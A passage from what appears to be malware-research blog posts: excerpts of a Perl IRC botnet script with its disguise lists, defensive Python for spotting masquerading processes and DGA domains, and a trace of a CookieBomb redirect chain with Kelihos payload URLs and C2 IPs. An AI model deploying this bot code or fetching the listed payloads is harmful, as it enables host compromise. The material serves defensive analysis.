"vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
"detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
"jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
"Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
"Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
"Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
"drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
"m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
"d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
"Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
"datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
"Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
"Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
"Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
"Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
"Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
"Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
"Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
"Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
"comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
"Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
"Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
"Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
"Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
"puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
"Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
"wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
"Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
"limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
"BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
"Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
"aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
"indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
"homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
"igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
"Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
"Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
"Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
"Oslos","Ils","cia","d3a","dea","nsa","nas","asa","kma","Scamurl","vito","xQt");

my @xident = ("noway","mirc","cmd","index","main","php","vuln","iiris","bx","sun","khan",
"info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
"caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
"do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
"sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
"lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
"adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
"remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
"los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
"email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
"email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
"dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
"pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
"shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
"does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
"liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
"loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
"koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
"inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
"fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
"lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
"nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
"liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
"drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
"pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
"rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
"jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
"deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
"kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
"dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
"ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
"jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
"hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
"pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
"beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
"testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
"nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
"loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
"owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");

my @xname = ("Googurl (C) 2006 xeQt","www.Google.com","* Im to lame to read Bitchx.doc *","BiatchX",
"Tveita Gjengen","Bgjengen","Agjengen","locos","putas","spooon","Type-R Turbo","Civic R Turbo",
"mIRC 6.1","* Im so lame i cant ready BitchX.doc *","Bill Gates","Cannon","Mtv","nos","nozzz",
"Sport Crew","vTeam","Turbo","random","paypal","netscam","www.milw0rm.com","lee","av","freace",
"trojan donkey","Monster Garage","Garage Inc.","Pimp Ma Shit","Pimp my ride","Freak out","Doch",
"www.packetstormsecurity.org","www.linux.com","www.freebsd.org","Hello There","tyson","mekkkka",
"Im just myself man","Can u get the clue?","Im not the only one","Fear the lions","mekka","nooo",
"Dragons back","Turbo Quattro","Sport Quattro","aheh goofy","Just for phun","gBill","goa","Yesir",
"Thats my mofo name","Snoooop Doggy Style...","Tricky Trickey","love, peace, and xeQt","rbot","ha",
"Clap your hands","one two tree, bass","lions","Drugs, sex, and xtc","i hate that biatch","ali",
"Go fuck yourself","whois meeee","Fatjoe Corp","Brooklyn Bounche","Dj Pulsedriver","lee","furu",
"Random","You have no clue","This rocks","uranium","BinLaden","Ted Bundy","Charlie Cheeens","hans",
"Will Smith","Freash Prince On IRC","Freash prince in bel air","Powered By PHPBB","mambo","ruy",
"dj pulse","Powered By xeQt","Delux","2pac","Biggie","Fuck sadam","Allah","Im your god idiot","id",
"Im to lame to read BitchX.doc","Boika","Diamonds","Jean claude Van dame","Arnold Schwartsneger",
"Stig","Anothony","White Power","Just do it","vSmotor vs. Turbo","Nismo Skyline GT-R R34","MySquad",
"Honda Civic Type-R","Maria Carrey","Terror Squad","I'm to lame to read BitchX.doc","w33d","hugo",
"WinXP 1999 (C) Bill Gates","Microsoft windows xeQtxpress","xeQt vS Mrx Team","Apache httpd server",
"arne","line","geir","terje","synne","linda","frode","my name?","teamrxPress","xeqters","asus power",
"Crash Test Dummy","Madonna","vX power","Team Windows","Bill Gates","Bill Gatez","Thats my girl...",
"Phunter","panter","Snaked","Hunted","Victums","PHPSH","mod_com_xQt","com_xeQter","com_team","assa",
"Nokia, Connecting People...","BitchX","smoke and fly","com_xeQt_Performance","TeaMrx Performance",
"xQt","Perlbot version vx9m0d v3","Googurl","Google lovers","xeQt_com","mrx_unit","com_asus","haist",
"TeaMrx Crew","xQt vS TeaMrx","xeQt vS Mrx","Powered by TeaMrx","Powered by xQt","com_xQt_mrx","com_x",
"com_teamrx","xeQt the way to go","Perl monks","perlhackers","perl genius","perl team","perl scanner",
"San Francisco","New York Gangbang..","Team Norway","Team Europe","Team Germany","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 - he tries to tell me what I put inside of me - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1キ9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

[...]

# xeQt

#my $nick = "bq";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'PowerBots (C) GohacK';

[...]
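The @fakeps list and the $hiddenprocess option above show how the bot hides on the host: it rewrites its own command line so that ps shows an httpd or sshd, while the executable behind the process is still the Perl interpreter. On Linux that leaves a visible inconsistency between /proc/<pid>/cmdline and the /proc/<pid>/exe link. The following is an added example (not the post's own tooling) that checks for exactly that; the disguise names are quoted from the script above, the interpreter list and the sample process table are constructed for the example.

```python
import os

# Names the bot picks to disguise itself (quoted from @fakeps and
# $hiddenprocess above).  A genuine daemon's argv[0] matches its executable.
DISGUISE_NAMES = ["/usr/local/apache/bin/httpd -DSSL", "/usr/sbin/httpd -k start -DSSL",
                  "/usr/sbin/httpd", "gnome-pty-helper", "httpd", "/usr/sbin/sshd"]

# Interpreters a renamed script would still be running under (constructed list).
INTERPRETERS = {"perl", "python", "python2", "python3", "php", "sh", "bash", "dash"}

# Constructed sample process table: (pid, argv[0] from cmdline, readlink of exe).
SAMPLE_PROCS = [
    (1234, "/usr/sbin/httpd", "/usr/bin/perl"),                   # bot posing as httpd
    (1235, "/usr/sbin/httpd -k start -DSSL", "/usr/sbin/httpd"),  # real Apache worker
    (1236, "gnome-pty-helper", "/usr/bin/perl (deleted)"),         # bot, binary already removed
    (1237, "nginx: worker process", "/usr/sbin/nginx"),            # nginx rewrites argv[0] legitimately
    (1238, "sshd: user@pts/0", "/usr/sbin/sshd"),                  # sshd session process
]


def _name(s):
    """Base name of the first word of a command line or exe path ("nginx:" -> "nginx")."""
    s = s.replace(" (deleted)", "").strip()
    return os.path.basename(s.split(" ")[0]).rstrip(":") if s else ""


def classify(argv0, exe):
    claimed, real = _name(argv0), _name(exe)
    if not real:
        return "unknown"       # exe link unreadable (needs root) or a kernel thread
    if claimed == real:
        return "ok"
    if real in INTERPRETERS:
        return "masquerade"    # a script that rewrote $0 to look like a daemon
    return "mismatch"          # renamed native binary: worth a look, lower confidence


def audit(procs):
    """Return the processes whose claimed name does not match their executable."""
    flagged = []
    for pid, argv0, exe in procs:
        v = classify(argv0, exe)
        if v != "ok":
            flagged.append({"pid": pid, "argv0": argv0, "exe": exe, "verdict": v,
                            "known_disguise": _name(argv0) in {_name(d) for d in DISGUISE_NAMES}})
    return flagged


def read_proc(pid):
    """argv[0] and exe link for one live process (Linux /proc); None if unreadable."""
    base = "/proc/%d" % pid
    try:
        with open(base + "/cmdline", "rb") as fh:
            argv0 = fh.read().split(b"\0")[0].decode("latin-1")
        exe = os.readlink(base + "/exe")
    except OSError:
        return None
    return pid, argv0, exe


def audit_live():
    """Audit every process on this host (run as root to read other users' exe links)."""
    procs = [read_proc(int(d)) for d in os.listdir("/proc") if d.isdigit()]
    return audit([p for p in procs if p])


if __name__ == "__main__":
    for row in audit(SAMPLE_PROCS):
        print(row)
```

A second, independent signal on Linux is /proc/<pid>/comm, which still reads "perl" for a script that only rewrote its argv; comparing comm against argv[0] catches the same trick without needing root for the exe link.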

Moral of the story

1. Attacks that seem to come from country AAA might not really come from AAA; please be careful about this.
2. What was stated/written as Romanian Hacker/AntiSec actually had, to me, the taste of skids from ANOTHER territory, judging by some keywords that were modified in the source code of the attacker's script and other attack tools, and after checking their IRC channel more deeply.
3. Harden your web server, and if you use an old PHP... #PatchNow!

Kudoz The Team Work!

MalMouse explains in his blog HOW WIDE the target of these attacks is:

Our friend @n300trg suggests how to get a better view of the hacked web server's page in China: Our friend @botnet_hunter came to the same conclusion as I did and straightforwardly exposes the facts:

Samples

The file size was huge and could not be uploaded to our mediafire.. so below is the alternative:

We are uploading the sample via FTP for Law Enforcement evidence collection and security research purposes only; we don't share the sample with requesters using a private address or a Twitter account, so please prepare your FTP account and contact us via this post's comment section (not to be published!), mentioning your real name, your entity and an email address for the reply. Thank you in advance. Below is the archive snapshot:


#MalwareMustDie!

How bad an IP's Reputation can be? A story of: 31.170.179.179 & 62.116.143.18 (park domains)

Many people often ask me "Can we trust a malicious IP report?", and I always answer: "Hell, yes!", because behind those reports there are dedicated researchers working hard to prove its badness, and believe me, nobody ever wants to issue a false positive verdict.., so most of the malware and security researchers involved confirm against other references or discuss with others to be sure beforehand.

This is a story about the IP address 31.170.179.179; it is still happily up and alive with the details below:

The IP is marked as bad (now). It has a very bad history; I was actually thinking this is a parked domains' IP, but it still "IS" a bad, bad, evil IP, and I will describe its badness in my poor writing below:
(Note: Please block 31.170.179.179 and 62.116.143.18, and the malware served by these hosts)

Historical & Reputation Research of 31.170.179.179 :

Below is the recent historical data of the IP; feel free to search each domain stated in the details below to PoC what I state.

xxx.wds03.com series of DGA...

nxfifwwsia.wds03.com  A  31.170.179.179
lbkxibmtqb.wds03.com A 31.170.179.179
wpad.wds03.com A 31.170.179.179
yaivjmqekg.wds03.com A 31.170.179.179
drwfvaol.wds03.com A 31.170.179.179
sgtxranpom.wds03.com A 31.170.179.179
isatap.wds03.com A 31.170.179.179
ggrixhspar.wds03.com A 31.170.179.179
ltbgnkzrzr.wds03.com A 31.170.179.179
batmoflaqft.wds03.com A 31.170.179.179
jwmspvljlv.wds03.com A 31.170.179.179
vqblegfygqwgrqv.wds03.com A 31.170.179.179
qpfjfcpsdy.wds03.com A 31.170.179.179
ygwnaxsuoy.wds03.com A 31.170.179.179
zsnwosoziz.wds03.com A 31.170.179.179
xxx.x[1|2]-line.com series of DGA...

xjfiozjjbg.a1-line.com A 31.170.179.179
saqzurmcudg.a1-line.com A 31.170.179.179
vrnftosdtr.a1-line.com A 31.170.179.179
frrdwoidpt.a1-line.com A 31.170.179.179
mcipgaxv.a1-line.com A 31.170.179.179
bamaghbarm.c1-line.com A 31.170.179.179
ivcodrfdmw.c1-line.com A 31.170.179.179
xwvxbjxnpc.c2-line.com A 31.170.179.179
nkrjtpmbjlaf.c2-line.co A 31.170.179.179
imcuctlmdch.c2-line.com A 31.170.179.179
bdukyhcboxps.c2-line.co A 31.170.179.179
uvypmbkkqa.e2-line.com A 31.170.179.179
marduxfkcp.e2-line.com A 31.170.179.179
boodeyprwq.e2-line.com A 31.170.179.179
aodnmpcvcv.e2-line.com A 31.170.179.179
ulalzvsniy.e2-line.com A 31.170.179.179
zxvsfkgraz.e2-line.com A 31.170.179.179
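The labels above look algorithmically generated: long consonant clusters and almost no vowels, which is not how people name hosts. Two exceptions in the same zone, wpad and isatap, are names Windows clients look up automatically, which a zone that answers every query with the same A record will resolve too, so the label itself rather than the fact of resolution is what to score. The following is an added example (not the post's own tooling) of a cheap per-label heuristic over passive-DNS names; the host list is constructed from the records listed above plus two ordinary names, and the thresholds are assumptions chosen for this sample, not tuned against real traffic.

```python
import math
from collections import Counter

VOWELS = set("aeiou")

# Constructed sample modelled on the passive-DNS records listed above: random-
# looking labels under wds03.com and a1-line.com, the two Windows auto-discovery
# names (wpad, isatap) and two ordinary names that should not be flagged.
SAMPLE_HOSTS = [
    "nxfifwwsia.wds03.com", "lbkxibmtqb.wds03.com", "wpad.wds03.com",
    "yaivjmqekg.wds03.com", "drwfvaol.wds03.com", "isatap.wds03.com",
    "batmoflaqft.wds03.com", "jwmspvljlv.wds03.com",
    "vqblegfygqwgrqv.a1-line.com", "xjfiozjjbg.a1-line.com",
    "mail.example.com", "www.example.com",
]


def longest_consonant_run(label):
    run = best = 0
    for ch in label:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def vowel_ratio(label):
    letters = [c for c in label if c.isalpha()]
    return sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0


def shannon_entropy(label):
    """Bits per character; reported for context, not used in the decision."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def looks_generated(label, min_len=7, max_run=4, long_len=10, min_vowels=0.35):
    """Assumed thresholds: short labels are never flagged (too little signal);
    otherwise flag a long consonant cluster, or a long label with few vowels."""
    if len(label) < min_len:
        return False
    return (longest_consonant_run(label) >= max_run
            or (len(label) >= long_len and vowel_ratio(label) < min_vowels))


def score_hosts(hosts):
    rows = []
    for host in hosts:
        label = host.split(".")[0].lower()
        rows.append({"host": host, "label": label,
                     "entropy": round(shannon_entropy(label), 2),
                     "consonant_run": longest_consonant_run(label),
                     "vowel_ratio": round(vowel_ratio(label), 2),
                     "suspect": looks_generated(label)})
    return rows


def suspect_hosts(hosts):
    return [r["host"] for r in score_hosts(hosts) if r["suspect"]]


if __name__ == "__main__":
    for r in score_hosts(SAMPLE_HOSTS):
        print("%-28s run=%2d vowels=%.2f H=%.2f %s"
              % (r["host"], r["consonant_run"], r["vowel_ratio"], r["entropy"],
                 "SUSPECT" if r["suspect"] else ""))
```

The point is the ratio in the output: when a zone resolves a dozen such labels to one IP, with only the auto-discovery names looking human, the zone is a wildcard used as throw-away hostnames, and that is a property of the IP rather than of any single domain.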

(Spoofing?? Parking??) Records for reverse-IP "in-addr.arpa" names.. weird..

171.80.117.50.in-addr.arpa  A  31.170.179.179
219.80.117.50.in-addr.arpa A 31.170.179.179
149.80.117.50.in-addr.arpa A 31.170.179.179
201.128.241.213.202.in-addr.arpa A 31.170.179.179
106.216.234.173.in-addr.arpa A 31.170.179.179
200.196.234.173.in-addr.arpa A 31.170.179.179
140.196.234.173.in-addr.arpa A 31.170.179.179
240.196.234.173.in-addr.arpa A 31.170.179.179
50.196.234.173.in-addr.arpa A 31.170.179.179
221.196.234.173.in-addr.arpa A 31.170.179.179
22.196.234.173.in-addr.arpa A 31.170.179.179
84.196.234.173.in-addr.arpa A 31.170.179.179
125.196.234.173.in-addr.arpa A 31.170.179.179
65.196.234.173.in-addr.arpa A 31.170.179.179
95.196.234.173.in-addr.arpa A 31.170.179.179
6.196.234.173.in-addr.arpa A 31.170.179.179
16.196.234.173.in-addr.arpa A 31.170.179.179
186.196.234.173.in-addr.arpa A 31.170.179.179
127.196.234.173.in-addr.arpa A 31.170.179.179
187.196.234.173.in-addr.arpa A 31.170.179.179
8.196.234.173.in-addr.arpa A 31.170.179.179
48.196.234.173.in-addr.arpa A 31.170.179.179
98.196.234.173.in-addr.arpa A 31.170.179.179
9.196.234.173.in-addr.arpa A 31.170.179.179
219.196.234.173.in-addr.arpa A 31.170.179.179
139.196.234.173.in-addr.arpa A 31.170.179.179
6.218.74.64.in-addr.arpa A 31.170.179.179
194.242.61.94.in-addr.arpa A 31.170.179.179
141.173.117.195.in-addr.arpa A 31.170.179.179
200.128/25.139.151.216.in-addr.arpa A 31.170.179.179
241.128/25.139.151.216.in-addr.arpa A 31.170.179.179
155.128/25.250.152.216.in-addr.arpa A 31.170.179.179

Palevo Botnet's CnC:


URL: https://palevotracker.abuse.ch/?ipaddress=31.170.179.179 (Thanks to ABUSE.CH)

With the UrlQuery records flagged as a threat by Emerging Threats (good work!): URL: http://goo.gl/KD6XxT

Kelihos domains and payloads (thanks to OP-Kelihos, great team!):

h00p://bixepfet.nl/inkr001.exe
h00p://yjtucerr.nl/nothin3.exe
h00p://jegijfyr.nl/nothin3.exe
h00p://huvjeyjq.nl/userid2.exe
h00p://qavukzak.nl/inkr001.exe
h00p://judnopem.nl/traff01.exe

VirusTotal has a longer history of this IP (thanks for the good record!):

Link-->>[HERE]

OpenDNS Umbrella Labs' graph (thank you for sharing the tool!) has long records too:

And so on...

The past stays in the past.. No?

Up to this point some people may think: "Yes, it was harmful, but maybe it was a VPS used by bad actors, so now it has "maybe" become a clean and parked one."
Well, that possibility exists, but let's check it deeper using fresh status too. So I checked links to that IP and found the recent verdict below..

CookieBomb Infection as per TODAY (note the uppercase)

I am lucky.. an infected local site was just freshly spotted in the honeypot, see the marked date:

(Note the date of the screenshot)

This is that evil code:

With a simple JS decode:

This leads us to ww9.jolyzgus.nl (31.170.179.179).. with an unusual hula-hoop of multiple self-redirections.
PS: Below is the correct way to trace a CookieBomb, in case you need a reference. PS2: mind the referrer used ;-))

* Connect() to jolyzgus.nl port 80 (#0)
* Trying 31.170.179.179...
* connected
* Connected to jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET /count21.php HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: jolyzgus.nl
> Accept: */*
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 12:04:22 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww9.jolyzgus.nl
< Vary: Accept-Encoding

:
* Connected to ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.jolyzgus.nl
> Accept: */*
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:36:01 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
:
* About to connect() to ww9.ww9.jolyzgus.nl port 80 (#0)
* Trying 31.170.179.179...
* connected
* Connected to ww9.ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:36:47 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.3.10-1ubuntu3.7
< Location: h00p://ww9.ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
:
* About to connect() to ww9.ww9.ww9.jolyzgus.nl port 80 (#0)
* Trying 31.170.179.179...
* connected
* Connected to ww9.ww9.ww9.jolyzgus.nl (31.170.179.179) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww9.ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 302 Found
< Server: nginx
< Date: Fri, 01 Nov 2013 14:37:16 GMT
< Content-Type: text/html
< Content-Length: 0
< Connection: keep-alive
< X-Powered-By: PHP/5.4.4-14
< Location: h00p://ww6.ww9.ww9.ww9.jolyzgus.nl
< Vary: Accept-Encoding
It is then forwarded to a TDS at ww6.ww9.ww9.ww9.jolyzgus.nl (62.116.143.18), which kicks in the parked domain's script.
* Connect() to ww6.ww9.ww9.ww9.jolyzgus.nl port 80 (#0)
* Trying 62.116.143.18...
* connected
* Connected to ww6.ww9.ww9.ww9.jolyzgus.nl (62.116.143.18) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: ww6.ww9.ww9.ww9.jolyzgus.nl
> Accept: * / *
> Referer: greetz.from.malwaremustdie.org
> Cookie: visited_uq=55; expires=Tue, 2 Nov 2013 14:40:07 GMT; path=/

< HTTP/1.1 200 OK
< Server: nginx
< Date: Fri, 01 Nov 2013 14:16:49 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: keep-alive
< Keep-Alive: timeout=5
< Vary: Accept-Encoding
< X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>jolyzgus.nl</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script type='text/javascript' language='JavaScript'>
var domain = 'jolyzgus.nl';
var uniqueTrackingID = 'MTM4MzMxNTQwOS43OTY4OmQ0ZjMzMTViMWY2NDUxMTY5NzlmMjM0ZmViNDZiZTUwYTI2Zjk0NWE=';
var clickTracking = true;
var themedata = '';
var xkw = '';
var xsearch = '';
var xpcat = '';
var rxid = '';
var bucket = '';
var clientID = '';
var clientIDs = '';
var num_ads = 0;
var adtest = 'off';
var scriptPath = '';
</script>
<script src='h00p://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>
<script type='text/javascript' language='JavaScript'>clickTracking = false;</script>
</head>
<body>
<script type='text/javascript' language='JavaScript'>
window.onload = function() {
if(clickTracking && typeof track_onclick == 'function') track_onclick("d767765fe07cda70072a07be8009b9e13b9ce70d");
location.href = "h00p://searchresultsguide.com/?dn=jolyzgus.nl&pid=9POGER71L";
};
</script>
</body>
* Connection #0 to host ww6.ww9.ww9.ww9.jolyzgus.nl left intact
</html>* Closing connection #0
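The hop-by-hop trace above can be reproduced in a few lines of Python. The script below is an added example, not a tool from the post: the live fetcher sends the same User-Agent, Referer and Cookie as the curl session, and REPLAY is a constructed offline copy of the captured hops so the tracer can be exercised without touching the network.

```python
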